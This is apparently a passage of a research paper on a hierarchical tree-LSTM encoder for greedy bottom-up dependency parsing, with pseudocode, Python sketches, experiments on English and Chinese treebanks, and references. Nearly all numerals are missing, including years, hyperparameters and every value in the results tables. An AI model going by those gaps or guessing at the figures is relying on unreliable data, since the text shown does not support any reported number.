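    return g(W_e.dot(np.concatenate([e_l, e_r])) + b_e)
```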
representing words
in the discussion above we assume a vector representation vi associated with the ith sentence word. what does vi look like? a sensible approach would be to take vi to be a function of the word-form and the part-of-speech (pos) tag of the ith word, that is:

vi = g(wv · (wi ◦ pi) + bv)

where wi and pi are the embedded vectors of the word-form and pos-tag of the ith word. this encodes each word in isolation, disregarding its context. the context of a word can be very informative regarding its meaning. one way of incorporating context is the bidirectional rnn (schuster and paliwal, ). bidirectional rnns are shown to be an effective representation for sequence tagging (irsoy and cardie, ). bidirectional rnns represent a word in the sentence using a concatenation of the end-states of two rnns, one running from the beginning of the sentence to the word and the other running from the end to the word. the result is a vector representation for each word which captures not only the word but also its context.

(figure: network for encoding the sentence "the black fox who really likes apples did not jump over a lazy dog yesterday". top: the network structure; boxed nodes represent lstm cells, where l cells belong to the left-modifiers sequence model rnnl and r cells to the right-modifiers sequence model rnnr, and circle nodes represent a concatenation followed by a linear transformation and a non-linearity. bottom: the dependency parse of the sentence.)

we adopt the bidirectional lstm scheme to enrich our node vector representation, and for an n-word sentence compute the vector representations vi as follows:

v′i = g(wv · (wi ◦ pi) + bv)
fi = lstmf(v′1, v′2, . . . , v′i)
bi = lstmb(v′n, v′n−1, . . . , v′i)
vi = (fi ◦ bi)

we plug this word representation in as the word vectors, allowing each word vector vi to capture information regarding the word form and pos-tag, as well as the sentential context it appears in. the bi-lstm encoder is trained jointly with the rest of the network towards the parsing objective, using back-propagation.

embedding vectors. the word and pos embeddings wi and pi are also trained together with the network. for the word embeddings, we experiment with random initialization, as well as with initialization using pre-trained word embeddings. our main goal in this work is not to provide top parsing accuracies, but rather to evaluate the ability of the proposed compositional architecture to learn and capture the structural cues that are needed for accurate parsing. thus, we are most interested in the random-initialization setup: what can the network learn from the training corpus alone, without relying on external resources? however, the ability to perform semi-supervised learning by initializing the word embeddings with vectors that are pre-trained on a large amount of unannotated data is an appealing property of the neural-network approaches, and we evaluate our parser also in this semi-supervised setup.
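a brief sketch of the context-sensitive word vectors vi defined above follows; the embedding tables, lstm encoders and function names are stand-ins supplied by the caller, not the released implementation.

```python
# a schematic sketch of the word vectors vi = (f_i . b_i) defined above.
# lstm_f / lstm_b are any functions mapping a list of vectors to a state vector;
# a real implementation would run each lstm once and reuse intermediate states.
import numpy as np

def word_vectors(words, tags, word_emb, pos_emb, W_v, b_v, lstm_f, lstm_b):
    # local (context-free) representations v'_i from word form and pos tag
    v_local = [np.tanh(W_v.dot(np.concatenate([word_emb[w], pos_emb[p]])) + b_v)
               for w, p in zip(words, tags)]
    n = len(v_local)
    vs = []
    for i in range(n):
        f_i = lstm_f(v_local[:i + 1])                 # forward state over v'_1..v'_i
        b_i = lstm_b(list(reversed(v_local[i:])))     # backward state over v'_n..v'_i
        vs.append(np.concatenate([f_i, b_i]))
    return vs
```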
when using pre- trained word embeddings, we follow (dyer et al., ) and use embedding vectors which are trained using positional context (ling et al., ), as these were shown to work better than traditional skip- gram vectors for syntactic tasks such as part-of- speech tagging and parsing. . a note on the head-outward generation why did we choose to encode the children from the head outward, and not the other way around? the head outward generation order is needed to facili- tate incremental tree construction and allow for ef- ficient parsing, as we show in section below. be- sides the efficiency considerations, using the head- outward encoding puts more emphasis on the outer- most dependants, which are known to be the most in- formative for predicting parse structure. we rely on the rnn capability of extracting information from arbitrary positions in the sequence to incorporate in- formation about the head word itself, which appears in the beginning of the sequence. this seems to work well, which is expected considering that the average maximal number of siblings in one direction in the ptb is . , and lstms were demonstrated to capture much longer-range interactions. still, when using the tree encoding in a situation where the tree is fully specified in advance, i.e. for sentence classi- fication, sentence similarity or translation tasks, us- ing a head-inward generation order (or even a bi- directional rnn) may prove to work better. we leave this line of inquiry to future work. the head-outward modifier generation approach has a long history in the parsing literature, and goes back to at least eisner ( ) and collins ( ). in contrast to previous work in which each modi- fier could condition only on a fixed small number of modifiers preceding it, and in which the left- and right- sequences of modifiers were treated as inde- pendent from one another for computational effi- ciency reasons, our approach allows the model to access information from the entirety of both the left and the right sequences jointly. features in transition-based dependency parsers often look at the current left-most and right-most dependents of a given node, and almost never look further than the second left-most or second right-most dependents. second-order graph based dependency parsers (mcdonald, ; eisner, ) also con- dition on the current outermost dependent when generating its sibling. parsing algorithm we now turn to explain how to parse using the tree encoder defined above. we begin by describing our bottom-up parsing algorithm, and then show how the encoded vector representation can be built and main- tained throughout the parsing process. . bottom-up parsing we follow a (projective) bottom-up parsing strategy, similar to the easy-first parsing algorithm of gold- berg and elhadad ( ). the main data-structure in the parser is a list of partially-built parse trees we call pending. for a sentence with words w , . . . ,wn, the pending list is initialized with n nodes, where pending[i] corre- sponds to word wi. the algorithm then chooses two neighbouring trees in the pending list pending[i] and pending[i + ] and either attaches the root of pending[i+ ] as the right-most modifier of the root of pending[i], or attaches the root of pending[i] as the left-most modifier of the root of pending[i + ]. the tree which was treated as modifier is then re- moved from the pending list, shortening it by one. the process ends after n− steps, when a single tree remains in the pending list, which is taken to be the output parse tree. 
the parsing process is described in the following algorithm.

algorithm (parsing):
  input: sentence w = w1, . . . , wn
  for i ∈ 1, . . . , n do
      pend[i].id ← i
  arcs ← []
  while |pend| > 1 do
      a ← {(i, d) | 1 ≤ i < |pend|, d ∈ {l, r}}
      i, d ← select(a)
      if d = l then
          m, h ← pend[i], pend[i + 1]
          pend.remove(i)
      else
          h, m ← pend[i], pend[i + 1]
          pend.remove(i + 1)
      arcs.append(h.id, m.id)
  return arcs

this parsing algorithm is both sound and complete with respect to the class of projective dependency trees (goldberg and elhadad, ). the algorithm depends on non-deterministic choices of an index in the pending list and an attachment direction (the select step). when parsing in practice, the non-deterministic choice is replaced by a trained classifier that assigns a score to each index-direction pair and selects the highest-scoring pair. we discuss the scoring function and the training algorithm below.

bottom-up tree-encoding
we would like the scoring function to condition on the vector encodings of the subtrees it aims to connect. the following algorithm shows how to maintain the vector encodings together with the parsing algorithm, so that at every stage of the parsing process each item pending[i] is associated with a vector encoding of the corresponding tree.

algorithm (parsing while maintaining tree representations):
  input: sentence w = w1, . . . , wn
  input: vectors vi corresponding to words wi
  arcs ← []
  for i ∈ 1, . . . , n do
      pend[i].id ← i
      pend[i].el ← rnnl.init().append(vi)
      pend[i].er ← rnnr.init().append(vi)
  while |pend| > 1 do
      a ← {(i, d) | 1 ≤ i < |pend|, d ∈ {l, r}}
      i, d ← select(a)
      if d = l then
          m, h ← pend[i], pend[i + 1]
          m.c = m.el ◦ m.er
          m.enc = g(w(m.c) + b)
          h.el.append(m.enc)
          pend.remove(i)
      else
          h, m ← pend[i], pend[i + 1]
          m.c = m.el ◦ m.er
          m.enc = g(w(m.c) + b)
          h.er.append(m.enc)
          pend.remove(i + 1)
      arcs.add(h.id, m.id)
  return arcs

labeled tree representation
the tree representation described above does not account for the relation labels ℓ the parsing algorithm assigns to each edge. in cases where the tree is fully specified in advance, the relation of each word to its head can be added to the word representations vi. however, in the context of parsing, the labels become known only when the modifier is attached to its parent. we thus extend the tree representation by concatenating the node vector representation with a vector representation assigned to the label connecting the subtree to its parent. formally, only the final enc(t) equation changes:

enc(t) = g(we · (el ◦ er ◦ ℓ) + be)

where ℓ is a learned embedding vector associated with the given label.
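to make the bookkeeping in the second algorithm concrete, the following is a small python sketch of the pending-list loop; the select, rnn and compression components are stand-ins supplied by the caller, the names are illustrative, and this is not the authors' released code.

```python
# a sketch of the easy-first loop above: each pending item keeps the rnn states
# of its left- and right-modifier sequences, which are extended whenever the item
# acquires a new outermost modifier. select_fn, rnn_l, rnn_r and compress are
# stand-ins (e.g. rnn_l.initial() returns a state object with advance()/output()).
def parse(word_vecs, rnn_l, rnn_r, compress, select_fn):
    pend = []
    for i, v in enumerate(word_vecs, start=1):
        pend.append({
            "id": i,
            "el": rnn_l.initial().advance(v),   # left-modifier sequence state
            "er": rnn_r.initial().advance(v),   # right-modifier sequence state
        })
    arcs = []
    while len(pend) > 1:
        # select_fn returns a 0-based position i (0 <= i < len(pend) - 1) and a direction
        i, d = select_fn(pend)
        if d == "l":                            # pend[i] becomes a left modifier of pend[i+1]
            m, h = pend[i], pend[i + 1]
        else:                                   # pend[i+1] becomes a right modifier of pend[i]
            h, m = pend[i], pend[i + 1]
        m_enc = compress(m["el"].output(), m["er"].output())   # enc of the finished subtree
        if d == "l":
            h["el"] = h["el"].advance(m_enc)
            pend.pop(i)
        else:
            h["er"] = h["er"].advance(m_enc)
            pend.pop(i + 1)
        arcs.append((h["id"], m["id"]))
    return arcs
```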
scoring function
the parsing algorithm relies on a function select(a) for choosing the action to take at each stage. we model this function as:

select(a) = argmax_(i,d,ℓ)∈a score(pend, i, d, ℓ)

where score(·) is a learned function whose job is to assign scores to possible actions so as to reflect their quality. ideally, it will not only score correct actions above incorrect ones, but also more confident (easier) actions above less confident ones, in order to minimize error propagation in the greedy parsing process. when scoring a possible attachment between a head h and a modifier m with relation ℓ, the scoring function should attempt to reflect the following pieces of information:
• are the head words of h and m compatible under relation ℓ?
• is the modifier m compatible with the already existing modifiers of h? in other words, is m a good subtree to connect as an outer-most modifier in the subtree h?
• is m complete, in the sense that it has already acquired all of its own modifiers?

to this end, the scoring function looks at a window of k subtrees to each side of the head-modifier pair (pend[i−k], . . . , pend[i+1+k]), where the neighbouring subtrees are used to provide hints regarding possible additional modifiers of m and h that are yet to be acquired. we use k = in our experiments, for a total of 2k + 2 subtrees. this window approach is also used in the easy-first parser of goldberg and elhadad (goldberg and elhadad, ) and in works that extend it (tratz and hovy, ; ma et al., ; ma et al., ). however, unlike the previous work, which made use of extensive feature engineering and rich feature functions aiming at extracting the many relevant linguistic sub-structures from the subtrees and their interactions, we provide the scoring function solely with the vector encodings of the subtrees in the window.

modeling the labeled attachment score is more difficult than modeling the unlabeled score and is prone to more errors. moreover, picking the wrong label for an attachment causes less cascading error than picking the wrong attachment, which necessarily precludes the parser from reaching the correct tree structure. in order to partially overcome this issue, our scoring function is a sum of two auxiliary scoring functions, one scoring unlabeled and the other scoring labeled attachments. the unlabeled attachment score term in the sum functions as a fall-back which makes it easier for the parser to predict the attachment direction even when there is not sufficient certainty as to the label:

score(pend, i, d, ℓ) = scoreu(pend, i, d) + scorel(pend, i, d, ℓ)

each of scoreu and scorel is modeled as a multi-layer perceptron:

scoreu(pend, i, d) = mlpu(xi)[d]
scorel(pend, i, d, ℓ) = mlpl(xi)[(d, ℓ)]
xi = pend[i−k].c ◦ · · · ◦ pend[i+1+k].c

where mlpu and mlpl are standard multi-layer perceptron classifiers with one hidden layer (mlp(x) = w2 · g(w1 · x + b1) + b2) whose output layers have size 2 and 2·l respectively, [·] is an indexing operation, and we assume the values of d and (d, ℓ) are mapped to integer values.

computational complexity
the easy-first parsing algorithm works in o(n log n) time (goldberg and elhadad, ). the parser in this work differs in three aspects: running a bi-lstm encoder prior to parsing (o(n)); maintaining the tree representations during parsing (the encoding-update lines in the second algorithm), which takes constant time at each parsing step; and local scoring using an mlp rather than a linear classifier (again, a constant-time operation). thus, the parser maintains the o(n log n) complexity of the easy-first parser.

training algorithm
loss and parameter updates
at each step of the parsing process we select the highest-scoring action (i, d, ℓ). the goal of training is to set the score function such that correct actions are scored above incorrect ones. we use a margin-based objective, aiming to maximize the margin between the highest-scoring correct action and the set of incorrect actions. formally, we define a hinge loss for each parsing step as follows:

max{0, 1 − max_(i,d,ℓ)∈g score(pend, i, d, ℓ) + max_(i′,d′,ℓ′)∈a\g score(pend, i′, d′, ℓ′)}

where a is the set of all possible actions and g is the set of correct actions at the current stage.
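the following is a small sketch of the two scoring mlps and the per-step hinge loss described above; the weight tuples, the window size k, the integer indexing of d and (d, ℓ), and the omitted boundary padding are illustrative assumptions rather than the released implementation.

```python
# a sketch of the unlabeled/labeled scoring mlps and the per-step hinge loss.
# U and L are (W1, b1, W2, b2) weight tuples for the two mlps; boundary padding
# of the window is omitted for brevity.
import numpy as np

def mlp(x, W1, b1, W2, b2):
    # one-hidden-layer perceptron: W2 * g(W1 * x + b1) + b2
    return W2.dot(np.tanh(W1.dot(x) + b1)) + b2

def score_action(pend, i, d_idx, dl_idx, k, U, L):
    # concatenate the .c vectors of the subtrees in the window around the pair (i, i+1)
    window = [pend[j]["c"] for j in range(i - k, i + 2 + k)]
    x = np.concatenate(window)
    score_u = mlp(x, *U)[d_idx]        # unlabeled score, indexed by direction
    score_l = mlp(x, *L)[dl_idx]       # labeled score, indexed by (direction, label)
    return score_u + score_l

def step_hinge_loss(scores_gold, scores_wrong):
    # margin loss: highest-scoring gold action vs highest-scoring incorrect action
    return max(0.0, 1.0 - max(scores_gold) + max(scores_wrong))
```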
as the scoring function depends on vector- encodings of all trees in the window, and each tree- encoding depends on the network’s parameters, each parameter update will invalidate all the vector en- codings, requiring a re-computation of the entire network. we thus sum the local losses through- out the parsing process, and update the parameter with respect to the sum of the losses at sentence boundaries. since we are using hinge loss the gradi- ents will become sparser as the training progresses. fewer non-zero gradients could translate to unreli- able updates. in order to increase gradient stability and training speed, we use a variation of mini-batch in which we update the parameters only after er- rors were made. this assures us a sufficient number of gradients for every update thus minimizing the effect of gradient instability. the gradients of the entire network with respect to the sum of the losses are calculated using the backpropagation algorithm. initial experiments with an sgd optimizer showed very instable results. we settled instead on using the adam optimizer (kingma and ba, ) which worked well without requiring fiddling with learning rates. . error-exploration and dynamic oracle training at each stage in the training process, the parser as- signs scores to all the possible actions (i,d,`) ∈ a. it then selects an action, applies it, and moves to the next step. which action should be chosen? a sensi- ble option is to define g as the set of actions that can lead to the gold tree, and following the highest scor- ing actions in this set. however, using training in this manner tends to suffer from error propagation at test time. the parser sees only states that result from following correct actions. the lack of examples con- taining errors in the training phase makes it hard for the parser to infer the best action given partly erro- neous trees. in order to cope with this, we follow the error exploration training strategy, in which we let the parser follow the highest scoring action in a during training even if this action is incorrect, expos- ing it to states that result from erroneous decisions. this strategy requires defining the set g such that the correct actions to take are well-defined also for states that cannot lead to the gold tree. such a set g is called a dynamic oracle. error-exploration and dynamic-oracles were introduced by goldberg and nivre ( ). the dynamic oracle a dynamic-oracle for the easy-first parsing system we use is presented in (goldberg and nivre, ). briefly, the dynamic- oracle version of g defines the set of gold actions as the set of actions which does not increase the num- ber of erroneous attachments more than the mini- mum possible (given previous erroneous actions). the number of erroneous attachments is increased in three cases: ( ) connecting a modifier to its head prematurely. once the modifier is attached it is re- moved from the pending list and therefore can no longer acquire any of its own modifiers; ( ) connect- ing a modifier to an erroneous head, when the cor- rect head is still on the pending list; ( ) connecting a modifier to a correct head, but an incorrect label. dealing with cases ( ) and ( ) is trivial. to deal with ( ), we consider as correct only actions in which the modifier is complete. to efficiently iden- tify complete modifiers we hold a counter for each word which is initialized to the number of modifiers the word has in the gold tree. when applying an attachment the counter of the modifier’s gold head word is decreased. 
when the counter reaches zero, the sub-tree rooted at that word has no pending modifiers and is considered complete.

aggressive exploration. we found that even when using error-exploration, after one iteration the model remembers the training set quite well and does not make enough errors for error-exploration to be effective. in order to expose the parser to more errors, we employ a cost-augmentation scheme: we sometimes follow incorrect actions even if they score below correct actions. specifically, when the score of the correct action is greater than that of the wrong action but the difference is smaller than the margin constant, we choose to follow the wrong action with probability paug (we use paug = . in our experiments). pseudocode for the entire training algorithm is given in the supplementary material.

out-of-vocabulary items and word-dropout
due to the sparsity of natural language, we are likely to encounter at test time a substantial number of words that did not appear in the training data (oov words). oov words are likely even when pre-training the word representations on a large unannotated corpus. a common approach is to designate a special "unknown-word" symbol, whose associated vector is used as the word representation whenever an oov word is encountered at test time. in order to train the unknown-word vector, a possible approach is to replace all the words appearing in the training corpus fewer than a certain number of times with the unknown-word symbol. this approach gives a good vector representation for unknown words, but at the expense of ignoring many of the words in the training corpus. we instead propose a variant of the word-dropout approach (iyyer et al., ). during training, we replace a word with the unknown-word symbol with a probability that is inversely proportional to the frequency of the word. formally, we replace a word w appearing #(w) times in the training corpus with the unknown symbol with probability

punk(w) = α / (#(w) + α)

using this approach we learn a vector representation for unknown words with minimal impact on the training of sparse words.
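a minimal sketch of this word-dropout rule follows; the default α value and the unknown-symbol string are placeholders for illustration, not the values used in the paper.

```python
# a small sketch of the frequency-based word dropout rule p_unk(w) = alpha / (#(w) + alpha).
# the alpha default and the "<unk>" symbol are placeholders.
import random
from collections import Counter

def make_word_dropout(train_words, alpha=0.25):
    counts = Counter(train_words)
    def maybe_unk(word):
        # rarer words are replaced by the unknown symbol more often during training
        p_unk = alpha / (counts[word] + alpha)
        return "<unk>" if random.random() < p_unk else word
    return maybe_unk
```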
we did not follow this advice and made very few attempts at hyper-parameter tuning, using manual hill climbing until something seemed to work with reasonable ac- curacy, and then sticking with it for the rest of the experiments. https://github.com/clab/cnn/tree/ master/pycnn experiments and results we evaluated our parsing model to english and chi- nese data. for comparison purposes we followed the setup of (dyer et al., ). data for english, we used the stanford depen- dency (sd) (de marneffe and manning, ) con- version of the penn treebank (marcus et al., ), using the standard train/dev/test splitswith the same predicted pos-tags as used in (dyer et al., ; chen and manning, ). this dataset contains a few non-projective trees. punctuation symbols are excluded from the evaluation. for chinese, we use the penn chinese treebank . (ctb ), using the train/test/dev splits of (zhang and clark, ; dyer et al., ) with gold part- of-speech tags, also following (dyer et al., ; chen and manning, ). when using external word embeddings, we also use the same data as (dyer et al., ). experimental configurations we evaluated the parser in several configurations bot- tomupparser is the baseline parser, not using the tree-encoding, and instead repre- senting each item in pending solely by the vector-representation (word and pos) of its head word. bottomupparser+htlstm is using our hierarchical tree lstm representation. bottomupparser+htlstm+bi-lstm is the hierarchical tree lstm where we additionally use a bi-lstm encoding for the head words. finally, we added external, pre-trained word embeddings to the bottomupparser+htlstm+bi-lstm setup. we also evaluated the final parsers in a –pos setup, in which we did not feed the parser with any pos-tags. results results for english and chinese are pre- sented in tables and respectively. for compar- ison, we also show the results of the stack-lstm transition-based parser model of dyer et al ( ), which we consider to be a state-of-the-art greedy model which is also very competitive with search- based models, with and without pre-trained embed- dings, and with and without pos-tags. we thank dyer et al for sharing their data with us. dev test uas las uas las bottomupparser . . . . +htlstm . . . . +bi-lstm input . . . . +external embeddings . . . . dyer et al ( ) no external . . . . dyer et al ( ) w/ external . . . . c&m ( ) w/ external . . . . bottomup+all–pos . . . . dyer et al ( ) –pos . . . . table : english parsing results (sd) dev test uas las uas las bottomupparser . . . . +htlstm . . . . +bi-lstm . . . . +external embeddings . . . . dyer et al ( ) no external . . . . dyer et al ( ) w/ external . . . . c&m ( ) no external . . . . bottomup+all –pos . . . . dyer et al ( ) –pos . . . . table : chinese parsing results (ctb ) the trends are consistent across the two lan- guages. the baseline bottom-up parser performs very poorly. this is expected, as only the head- word of each subtree is used for prediction. when adding the tree-encoding, results jump to near state- of-the-art accuracy, suggesting that the composed vector representation is indeed successful in captur- ing predictive structural information. replacing the head-words with their bi-lstm encodings results in another increase in accuracy for english, outper- forming the dyer et al (s-lstm no external) models on the test-set. adding the external pre-trained em- beddings further improves the results for both our parser and dyer et al’s model, closing the gap be- tween them. 
when pos-tags are not provided as input, the numbers for both parsers drop. the drop is small for english and large for chinese, and our parser seem to suffer a little less than the dyer et al model. importance of the dynamic oracle we also eval- uate the importance of using the dynamic oracle and error-exploration training, and find that they are in- deed important for achieving high parsing accura- cies with our model (table ). english chinese uas las uas las rand . . . . rand-nodyn . . . . ext . . . . ext-nodyn . . . . table : effect of the error-exploration training (dynamic-oracle) on dev set accuracy in english and chi- nese. rand: random initialization. ext: pre-trained ex- ternal embeddings. when training without error-exploration (that is, the parser follows only correct actions during train- ing and not using the dynamic aspect of the ora- cle), accuracies of unseen sentences drop by be- tween . and . accuracy points (average . ). this is consistent with previous work on training with error-exploration and dynamic oracles (gold- berg and nivre, ), showing that the technique is not restricted to models trained with sparse linear models. comparison to other state-of-the-art parsers our main point of comparison is the model of dyer et al, which was chosen because it is (a) a very strong parsing model; and (b) is the closest to ours in the lit- erature: a greedy parsing model making heavy use of lstms. to this end, we tried to make the com- parison to dyer et al as controlled as possible, using the same dependency annotation schemes, as well as the same predicted pos-tags and the pre-trained embeddings (when applicable). it is also informative to position our results with respect to other state-of-the-art parsing results re- ported in the literature, as we do in table . here, some of the comparisons are less direct: some of the results use different dependency annotation schemes , as well as different predicted pos-tags, and different pre-trained word embeddings. while the numbers are not directly comparable, they do give a good reference as to the expected range of our english parsing experiments use the stanford depen- dencies scheme, while other work use less informative depen- dency relations which are based on the penn malt converter, using the yamada and matsumoto head rules. from our expe- rience, this conversion is somewhat easier to parse, resulting in numbers which are about . - . points higher than stanford dependencies. state-of-the-art parsing results. our system’s en- glish parsing results are in range of state-of-the-art and the chinese parsing results surpass it. these numbers are achieved while using a greedy, bottom up parsing method without any search, and while relying solely on the compositional tree representa- tions. related work we survey two lines of related work: methods for encoding trees as vectors, and methods for parsing with vector representations. the popular approach for encoding trees as vec- tors is using recursive neural networks (goller and kuchler, ; socher et al., ; tai et al., ). recursive neural networks represent the vector of a parent node in a tree as a function of its chil- dren nodes. however, the functions are usually re- stricted to having a fixed maximum arity (usually two) (socher et al., ; tai et al., ; socher, ). while trees can be binarized to cope with the arity restriction, doing so results in deep trees which in turn leads to the vanishing gradient problem when training. 
to cope with the vanishing gradients, (tai et al., ) enrich the composition function with a gating mechanism similar to that of the lstm, resulting in the so-called tree-lstm model. an- other approach is to allow arbitrary arities but ignor- ing the sequential nature of the modifiers, e.g. by using a bag-of-modifiers representation or a convo- lutional layer (tai et al., ; zhu et al., ). in contrast, our tree encoding method naturally allows for arbitrary branching trees by relying on the well established lstm sequence model, and using it as a black box. very recently, zhang et al. ( ) pro- posed an rnn-based tree encoding which is similar to ours in encoding the sequence of modifiers as an rnn. unlike our bottom-up encoder, their method works top-down, and is therefore not readily appli- cable for parsing. on the other hand the top-down approach is well suited for generation. in future work, it could be interesting to combine the bottom- up and top-down approaches in an encoder-decoder framework (sutskever et al., ; kiros et al., ). work by dyer et al ( ), that was submit- ted in parallel to ours, introduces a similar lstm- based representation of syntactic constituents in the context of phrase-grammar parsing. in terms of parsing with vector representations, there are four dominant approaches: search based parsers that use local features that are fed to a neural-network classifier (pei et al., ; durrett and klein, ); greedy transition based parsers that use local features that are fed into a neural- network classifier (chen and manning, ; weiss et al., ), sometimes coupled with a node com- position function (dyer et al., ; watanabe and sumita, ); bottom up parsers that rely solely on recursively combined vector encodings of sub- trees (socher et al., ; stenetorp, ; socher et al., a); and parse-reranking approaches that first produce a k-best list of parses using a traditional parsing technique, and then score the trees based on a recursive vector encoding of each node (le and zuidema, ; le and zuidema, ; zhu et al., ). our parser is a greedy, bottom up parser that re- lies on compositional vector encodings of subtrees as its sole set of features. unlike the re-ranking ap- proaches, we do not rely on an external parser to provide k-best lists. unlike the bottom-up parser in (socher et al., ) that only parses sentences of up to words and the parser of (stenetorp, ) that achieves very low parsing accuracies, we parse ar- bitrary sentences with near state-of-the-art accuracy. unlike the bottom up parser in (socher et al., a) we do not make use of a grammar. the parser of (weiss et al., ) obtains exceptionally high re- sults using local features and no composition func- tion. the greedy version of their parser uses exten- sive tuning of hyper-parameters and network depth in order to squeeze every possible bit of accuracy. adding beam search on top of that further improves results. due to our much more limited resources, we did not perform a methodological search over hyper-parameters, and explored only a tiny space of the possible hyper-parameters, and our parser does not perform search. finally, perhaps closest to our approach is the greedy, transition-based parser of (dyer et al., ) that also works in a bottom- up fashion, and incorporates an lstm encoding of the input tokens and hierarchical vector composi- tion into its scoring mechanism. indeed, that parser obtains similar scores to ours, although we obtain somewhat better results when not using pre-trained embeddings. 
we differ from the parser of dyer et system method representation emb ptb-ym ptb-sd ctb runtime zhangnivre transition (beam) large feature set (sparse) – . – . o(n)+ martins graph, rd order+ large feature set (sparse) – . . – o(n ) pei graph, nd order large feature set (dense) – . – – o(n ) this work easyfirst (greedy) rec-lstm encoding – – . . o(n log n) weiss transition (greedy) large feature set (dense) yes – . – o(n) weiss transition (beam) large feature set (dense) yes – . – o(n)+ pei graph, nd order large feature set (dense) yes . – – o(n ) lezuidema reranking /blend inside-outside recursive net yes . . – o(n ) zhu reranking /blend recursive conv-net yes . – . o(n)+ this work easyfirst (greedy) rec-lstm encoding yes – . . o(n log n) table : parsing results (uas) of various state-of-the-art parsing systems on the english and chinese datasets. the systems that use embeddings use different pre-trained embeddings. english results use predicted pos tags (different systems use different taggers), while chinese results use gold pos tags. ptb-ym: english ptb, yamada and matsumoto head rules. ptb-sd: english ptb, stanford dependencies (different systems may use different versions of the stanford converter. ctb: chinese treebank. reranking /blend in method column indicates a reranking system where the reranker score is interpolated with the base-parser’s score. the reranking systems’ runtimes are those of the base parsers they use. o(n)+ indicates a linear-time system with a large multiplicative constant. the different systems and the numbers reported from them are taken from: zhangnivre : (zhang and nivre, ); martins : (martins et al., ); weiss (weiss et al., ); pei : (pei et al., ); lezuidema (le and zuidema, ); zhu : (zhu et al., ). al by having a more elaborate vector-composition function, relying solely on the compositional repre- sentations, and performing fully bottom-up parsing without being guided by a stack-and-buffer control structure. conclusions and future work we suggest a compositional vector representation of parse trees that relies on a recursive combination of recurrent-neural network encoders, and demonstrate its effectiveness by integrating it in a bottom-up easy-first parser. future extensions in terms of pars- ing include the addition of beam search, handling of unknown-words using character-embeddings, and adapting the algorithm to constituency trees. we also plan to establish the effectiveness of our hierar- chical tree-lstm encoder by applying it to more semantic vector representation tasks, i.e. training tree representation for capturing sentiment (socher et al., b; tai et al., ), semantic sentence similarity (marelli et al., ) or textual inference (bowman et al., ). acknowledgements this research is supported by the intel collaborative research institute for com- putational intelligence (icri-ci) and the israeli sci- ence foundation (grant number / ). references ian goodfellow yoshua bengio and aaron courville. . deep learning. book in preparation for mit press, http://www.deeplearningbook.org. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language inference. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , lisbon, portugal, september. association for compu- tational linguistics. danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. 
in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. kyunghyun cho. . natural language under- standing with distributed representation. corr, abs/ . . michael collins. . three generative, lexicalised models for statistical parsing. in proceedings of the th annual meeting of the association for computa- tional linguistics, pages – , madrid, spain, july. association for computational linguistics. marie-catherine de marneffe and christopher d. man- ning. . stanford dependencies manual. techni- cal report, stanford university. greg durrett and dan klein. . neural crf parsing. in proceedings of the rd annual meeting of the as- sociation for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for com- putational linguistics. chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a. smith. . recurrent neural network grammars. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , san diego, california, june. association for computational linguistics. jason eisner. . three new probabilistic models for dependency parsing: an exploration. in th interna- tional conference on computational linguistics, pro- ceedings of the conference, coling , center for sprogteknologi, copenhagen, denmark, august - , , pages – . jason eisner. . bilexical grammars and their cubic- time parsing algorithms. advances in probabilistic and other parsing technologies. jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . yoav goldberg and michael elhadad. . an effi- cient algorithm for easy-first non-directional depen- dency parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguis- tics, pages – , los angeles, california, june. association for computational linguistics. yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of coling , pages – , mumbai, india, de- cember. the coling organizing committee. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, : – . yoav goldberg. . a primer on neural net- work models for natural language processing. corr, abs/ . . christoph goller and andreas kuchler. . learning task-dependent distributed representations by back- propagation through structure. in neural networks, ., ieee international conference on, volume , pages – . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . ozan irsoy and claire cardie. . opinion mining with deep recurrent neural networks. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. 
mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered composi- tion rivals syntactic methods for text classification. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of the rd international conference for learning repre- sentations, san diego, california. ryan kiros, yukun zhu, ruslan salakhutdinov, richard s. zemel, raquel urtasun, antonio torralba, and sanja fidler. . skip-thought vectors. in advances in neural information processing systems : annual conference on neural information processing systems , december - , , montreal, quebec, canada, pages – . sandra kübler, ryan t. mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. phong le and willem zuidema. . the inside- outside recursive neural network model for depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar, october. association for computational linguistics. phong le and willem zuidema. . the forest con- volutional network: compositional distributional se- mantics with a neural chart and without binarization. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , lisbon, portugal, september. association for computational linguistics. wang ling, chris dyer, alan w. black, and isabel tran- coso. . two/too simple adaptations of word vec for syntax problems. in naacl hlt , the conference of the north american chapter of the as- sociation for computational linguistics: human lan- guage technologies, denver, colorado, usa, may - june , , pages – . ji ma, tong xiao, jingbo zhu, and feiliang ren. . easy-first chinese pos tagging and dependency pars- ing. in proceedings of coling , pages – , mumbai, india, december. the coling organizing committee. ji ma, jingbo zhu, tong xiao, and nan yang. . easy-first pos tagging and dependency parsing with beam search. in proceedings of the st annual meet- ing of the association for computational linguistics (volume : short papers), pages – , sofia, bul- garia, august. association for computational linguis- tics. 